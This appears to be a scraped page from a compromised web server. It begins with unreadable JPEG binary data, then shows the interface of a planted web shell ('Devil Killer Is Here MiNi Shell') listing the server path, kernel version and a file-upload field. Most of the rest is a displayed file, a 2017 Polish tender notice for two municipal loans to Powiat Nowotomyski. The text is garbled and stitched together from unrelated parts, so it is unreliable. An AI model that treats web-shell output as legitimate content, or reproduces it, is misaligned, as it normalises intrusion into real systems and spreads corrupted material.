JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170531/521487-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 521487-N-2017 z dnia 2017-05-31 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Powiat Nowotomyski</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Udzielenie i obsługa 2 kredytów długoterminowych dla Powiatu Nowotomyskiego</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii"></span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy"></span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Powiat Nowotomyski</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">63127693700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Poznańska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">33</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">64-300 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Nowy Tomyśl</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">wielkopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">61 44 26 700</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">starostwo@powiatnowotomyski.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">614 423 589</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.powiatnowotomyski.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.powiatnowotomyski.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.powiatnowotomyski.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemny</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Starostwo Powiatowe w Nowym Tomyślu ul. Poznańska 33, 64-300 Nowy Tomyśl</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Udzielenie i obsługa 2 kredytów długoterminowych dla Powiatu Nowotomyskiego</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">DR.272.1.7.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest udzielenie i obsługa 2 kredytów długoterminowych w walucie polskiej dla Powiatu Nowotomyskiego.Zamówienie zostało podzielone na zadanie nr 1 i nr 2. Wykonawca może złożyć ofertę na całość zamówienia (dwa zadania) bądź ofertę częściową (na jedno zadanie). ZADANIE NR 11.	Przedmiotem zamówienia jest udzielenie i obsługa długoterminowego kredytu inwestycyjnego złotowego dla Powiatu Nowotomyskiego w wysokości 1.568.439,00zł na okres 10 lat z przeznaczeniem na inwestycje Powiatu Nowotomyskiego na podstawie Uchwały Nr XXVII/188/2017 Rady Powiatu Nowotomyskiego z dnia 15 lutego 2017r.2.	Kredyt w walucie polskiej.3.	Oprocentowanie zmienne, oparte na stawce WIBOR1M + stała marża bankowa ( Zamawiający zastrzega możliwość zmiany marży Banku poprzez jej obniżenie na wniosek Zamawiającego do poziomu oferowanego dla nowych kredytów udzielanych jednostkom samorządu terytorialnego).4.	Okres spłaty- od stycznia 2018 roku do 28 grudnia 2027 roku w okresach miesięcznych.5.	Wykonawca zobowiązany jest stawić do dyspozycji Zamawiającego kredyt w formie przelewu środków finansowych z rachunku kredytowego Wykonawcy na rachunek budżetu Powiatu nr 34 1020 4144 0000 6902 0007 0086. ( w formie polecenia przelewu).6.	Wykorzystanie kredytu nastąpi jednorazowo lub w ratach na podstawie dyspozycji Zamawiającego.7.	Kwota kredytu zostanie postawiona do dyspozycji Zamawiającego w okresie od 01 lipca 2017 roku do 31 grudnia 2017 w wysokości określonej na podstawie dyspozycji Zamawiającego ( w przypadku, gdy procedura przetargowa nie zostanie zakończona do 01.07.2017r., termin postawienia kredytu do dyspozycji ulegnie przesunięciu). 8.	Zamawiający zobowiązuje się do spłaty kapitału i odsetek w następującej formie:a)	Początek spłaty kapitału od 31 stycznia 2018 roku z rachunku budżetu Powiatu nr 34 1020 4144 0000 6902 0007 0086b)	Początek spłaty odsetek od kredytu od 31 stycznia 2018 oku z rachunku wydatków nr 69 1020 4027 0000 1002 1315 2485c)	Termin płatności rat kredytowych i odsetek od kredytu przypadający na ostatni dzień roboczy każdego miesiąca - raty płatne miesięcznied)	Wykonawca zobowiązany jest do informowania Zamawiającego o wysokości rat i odsetek miesięcznych do zapłaty w terminie do 22 każdego miesiąca.9.	Dopuszcza się możliwość spłaty kredytu przed ustalonym terminem bez ponoszenia dodatkowych opłat i prowizji ( odsetki naliczane do dnia spłaty kredytu, a nie do końca okresu umowy, bez prowizji rekompensacyjnej).10.	Zabezpieczenie kredytu stanowi weksel in blanco z wystawienia Zamawiającego wraz z deklaracją wekslową.11.	Umowa oraz weksel in blanco zostaną kontrasygnowane przez Skarbnika Powiatu.12.	Na potrzeby obliczenia odsetek od kredytu w umowie oraz na potrzeby obliczenia ceny ofert należy przyjąć kalendarz rzeczywisty tj. liczący 365/366 dni w roku przestępnym.13.	Koszty obsługi kredytu ( cenę ofertową) stanowią : oprocentowanie kredytu oraz marża.14.	Oprocentowanie kredytu dla obliczenia ceny oferty powinno być wyliczone w oparciu o stawkę bazową WIBOR 1M w wysokości obowiązującej na dzień 02.05.2017 roku15.	Wykonawca jest obowiązany do skalkulowania i podania w ofercie wyłącznie dwóch stawek w następujący sposób:o	Oprocentowanie kredytu w stosunku do stopy procentowej WIBOR 1M (wg stawki obowiązującej na dzień 02.05.2017 roku ogłoszonej w Rzeczpospolitej w dniu 02.05.2017 roku.o	Marża (w całym okresie kredytowania).16.	Kredyt nie może być obciążony innymi opłatami niż marża bankowa określona w ofercie Wykonawcy.17.	Do złożonej oferty Wykonawca załączy projekt umowy o udzielenie kredytu spełniający wyżej wymienione warunki udzielenia zamówienia.18.	Zamawiający dopuszcza możliwość zmniejszenia wysokości udzielonego kredytu w zależności od wyniku postępowania przetargowego na inwestycje Powiatu finansowane z kredytu.19.	Zamawiający zastrzega sobie możliwość zmiany spłaty kapitału i odsetek od zaciągniętego kredytu w ratach i terminach innych niż określono w harmonogramie ze względu na pogorszenie sytuacji ekonomiczno-finansowej.20.	W celu wstępnego zbadania zdolności kredytowej Zamawiającego, Zamawiający udostępni dokumenty formalno-prawne oraz dokumenty dotyczące sytuacji ekonomiczno-finansowej Zamawiającego w Biuletynie Informacji Publicznej na stronie Powiatu Nowotomyskiego.21.	Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w PLN.ZADANIE NR 21.	Przedmiotem zamówienia jest udzielenie i obsługa długoterminowego kredytu złotowego dla Powiatu Nowotomyskiego w wysokości 2.631.561zł na okres 10 lat z przeznaczeniem na spłatę wcześniej zaciągniętych zobowiązań Powiatu z tytułu kredytów na podstawie Uchwały Nr XXVII/187/2017 Rady Powiatu Nowotomyskiego z dnia 15 lutego 2017r.2.	Kredyt w walucie polskiej.3.	Oprocentowanie zmienne, oparte na stawce WIBOR1M + stała marża bankowa ( Zamawiający zastrzega możliwość zmiany marży Banku poprzez jej obniżenie na wniosek Zamawiającego do poziomu oferowanego dla nowych kredytów udzielanych jednostkom samorządu terytorialnego).4.	Okres spłaty od stycznia 2018 roku do 28 grudnia 2027 roku w okresach miesięcznych.5.	Wykonawca zobowiązany jest stawić do dyspozycji Zamawiającego kredyt w formie przelewu środków finansowych z rachunku kredytowego Wykonawcy na rachunek budżetu Powiatu nr 34 1020 4144 0000 6902 0007 0086. ( w formie polecenia przelewu).6.	Wykorzystanie kredytu nastąpi jednorazowo lub w ratach na podstawie dyspozycji Zamawiającego.7.	Kwota kredytu zostanie postawiona do dyspozycji Zamawiającego w okresie od 01 lipca 2017 roku do 31 grudnia 2017 w wysokości określonej na podstawie dyspozycji Zamawiającego ( w przypadku, gdy procedura przetargowa nie zostanie zakończona do 01.07.2017r., termin postawienia kredytu do dyspozycji ulegnie przesunięciu).8.	Zamawiający zobowiązuje się do spłaty kapitału i odsetek w następującej formie:a)	Początek spłaty kapitału od 31 stycznia 2018 roku z rachunku budżetu Powiatu nr 34 1020 4144 0000 6902 0007 0086b)	Początek spłaty odsetek od kredytu od 31 stycznia 2018 oku z rachunku wydatków nr 69 1020 4027 0000 1002 1315 2485c)	Termin płatności rat kredytowych i odsetek od kredytu przypadający na ostatni dzień każdego miesiąca - raty płatne miesięcznied)	Wykonawca zobowiązany jest do informowania Zamawiającego o wysokości rat i odsetek miesięcznych do zapłaty w terminie do 22 każdego miesiąca.9.	Dopuszcza się możliwość spłaty kredytu przed ustalonym terminem bez ponoszenia dodatkowych opłat i prowizji ( odsetki naliczane do dnia spłaty kredytu a nie do końca okresu umowy, bez prowizji rekompensacyjnej).10.	Zabezpieczenie kredytu stanowi weksel in blanco z wystawienia Zamawiającego wraz z deklaracją wekslową.11.	Umowa oraz weksel in blanco zostaną kontrasygnowane przez Skarbnika Powiatu.12.	Na potrzeby obliczenia odsetek od kredytu w umowie oraz na potrzeby obliczenia ceny ofert należy przyjąć kalendarz rzeczywisty tj. liczący 365/366 dni w roku przestępnym.13.	Koszty obsługi kredytu ( cenę ofertową) stanowią : oprocentowanie kredytu oraz marża.14.	Oprocentowanie kredytu dla obliczenia ceny oferty powinno być wyliczone w oparciu o stawkę bazową WIBOR 1M w wysokości obowiązującej na dzień 02.05.2017 roku.15.	Wykonawca jest obowiązany do skalkulowania i podania w ofercie wyłącznie dwóch stawek w następujący sposób:o	Oprocentowanie kredytu w stosunku do stopy procentowej WIBOR 1M (wg stawki obowiązującej na dzień 02.05.2017 roku ogłoszonej w Rzeczpospolitej z dnia 02.05.2017 roku.o	Marża (w całym okresie kredytowania)16.	Kredyt nie może być obciążony innymi opłatami niż marża bankowa określona w ofercie Wykonawcy.17.	Do złożonej oferty Wykonawca załączy projekt umowy o udzielenie kredytu spełniający wyżej wymienione warunki udzielenia zamówienia.18.	Zamawiający zastrzega sobie możliwość zmiany spłaty kapitału i odsetek od zaciągniętego kredytu w ratach i terminach innych niż określono w harmonogramie ze względu na pogorszenie sytuacji ekonomiczno-finansowej.19.	W celu wstępnego zbadania zdolności kredytowej Zamawiającego, Zamawiający udostępni dokumenty formalno-prawne oraz dokumenty dotyczące sytuacji ekonomiczno-finansowej Zamawiającego w Biuletynie Informacji Publicznej na stronie Powiatu Nowotomyskiego.20.	Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w PLN.Informacje uzupełniające:1)	Na rachunkach bankowych Zamawiającego nie ciążą zajęcia egzekucyjne,2)	U Zamawiającego nie był prowadzony program naprawczy w rozumieniu ustawy z dnia 27.08.2009r o finansach publicznych (Dz. U. Nr 157, poz. 1240 ze zm.),3)	Nie prowadzono wobec Zamawiającego, za pośrednictwem komornika sądowego, działań windykacyjnych zadłużenia,4)	Zamawiający nie posiada zaległych zobowiązań, w tym w szczególności wobec Zakładu Ubezpieczeń Społecznych oraz Urzędu Skarbowego.Zamawiający dopuszcza możliwość wystąpienia do Zakładu Ubezpieczeń Społecznych i Urzędu Skarbowego o wydanie zaświadczeń potwierdzających nie zaleganie ze składkami, które zostaną udostępni one na wniosek wybranego Wykonawcy przed podpisaniem umowy,5)	Dotychczas nie wystąpiła sytuacja, w której Zarząd Powiatu nie otrzymałby absolutorium,6)	Zamawiający nie posiada zadłużenia z tytułów:a)	Umów leasingowych,b)	Umów z odroczonym terminem płatności dłuższym niż o rok, o którym mowa w rozporządzeniu Ministra Finansów z dnia 28.12.2011r. w sprawie szczegółowego sposobu klasyfikacji tytułów dłużnych zaliczanych do państwowego długu publicznego (Dz. U. Nr 298,poz. 1767),7)	W Biuletynie Zamówień Publicznych Powiatu Nowotomyskiego, na stronie internetowej www.bip.powiatnowotomyski.plzakładka Finanse i mienie1.	W podzakładce Budżet:a)	Uchwała WPF 2016-2027,b)	Uchwała budżetowa Powiatu Nowotomyskiego 20172.	W podzakładce Sprawozdaniaa)	Sprawozdania za rok 2016, 2015, 2014, 2013, 2012, 20113.	W podzakładce Opinie RIOa)	Opinie RIO zakładka Rada Powiatu1.	W podzakładce Uchwały Rady Powiatua)	Uchwała Rady Powiatu w sprawie zaciągnięcia przez Powiat kredytu, będącym przedmiotem niniejszego zamówienia- Uchwała Nr XXVII/188/2017 Rady Powiatu Nowotomyskiego z dnia 15 lutego 2017r. w sprawie zaciągnięcia przez Powiat Nowotomyski długoterminowego kredytu,- Uchwała Nr XXVII/187/2017 Rady Powiatu Nowotomyskiego z dnia 15 lutego 2017r. w sprawie zaciągnięcia przez Powiat Nowotomyski długoterminowego kredytu,b)	Akty powołania na stanowiska przedstawicieli Zamawiającego- Uchwała Nr I/3/2014 Rady Powiatu Nowotomyskiego z dnia 1 grudnia 2014r. w sprawie stwierdzenia wyboru Starosty Nowotomyskiego,- Uchwała Nr I/4/2014 Rady Powiatu Nowotomyskiego z dnia 1 grudnia 2014r. w sprawie stwierdzenia wyboru Wicestarosty Nowotomyskiego,- Uchwała Nr I/5/2014 Rady Powiatu Nowotomyskiego z dnia 1 grudnia 2014r. w sprawie stwierdzenia wyboru Członków Zarządu Powiatu Nowotomyskiego.3.2. Podwykonawcy. Zamawiający nie dopuszcza powierzenia zamówienia podwykonawcy. Do osobistego wykonania zastrzega się całość przedmiotu zamówienia.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">66113000-5</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> 